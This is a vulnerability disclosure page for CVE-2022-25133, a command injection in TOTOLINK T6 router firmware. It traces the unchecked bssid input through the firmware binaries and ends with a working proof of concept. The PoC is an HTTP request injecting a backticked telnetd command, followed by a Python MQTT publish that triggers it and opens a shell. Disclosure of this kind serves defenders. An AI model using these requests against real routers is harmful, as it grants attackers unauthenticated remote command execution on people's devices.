Headline

CVE-2022-25133: my_vuln/20.md at main · pjqwudi1/my_vuln

A command injection vulnerability in the function isAssocPriDevice of TOTOLINK Technology router T6 V3_Firmware T6_V3_V4.1.5cu.748_B20211015 allows attackers to execute arbitrary commands via a crafted MQTT packet.

3 years ago

CVE

Open in Source

#vulnerability #ubuntu #linux #js #git #java

TOTOLINK Vulnerability

Vendor:TOTOLINK

Product:T6

Version:T6 V3_Firmware(T6_V3_V4.1.5cu.748_B20211015)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

Vulnerability description

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.(MQTT, no authentication required)

Remote Command Execution

In setWiFiRepeaterCfg function, bssid is directly passed by the attacker, so we can control the bssid to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the isAssocPriDevice function. We mainly explain the data flow of this part.

In cstecgi.cgi binary:

In setWiFiRepeaterCfg function, the input has not been checked.And then,call the function apmib_set to store this input.

In wireless.so binary:

As you can see here, the input has not been checked.

In libmystdlib.so function

Eventually, the initial input cause command injection.

Supplement

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

Vulnerability trigger steps:

set bssid =telnetd, in (setWiFiRepeaterCfg)
in (freeStaClient)

PoC

We set bssid as telnetd , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 53 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/basic/wifi.html?time=1644749893933 Cookie: SESSION_ID=2:1644749886:2

{"bssid":"`telnetd`","topicurl":"setWiFiRepeaterCfg"}

in (freeStaClient)

import paho.mqtt.client as mqtt client = mqtt.Client() client.connect("192.168.1.1",1883,60) client.publish(‘totolink/router/freeStaClient’,payload=’{"hack":"hack"}’)

Result

Get a shell!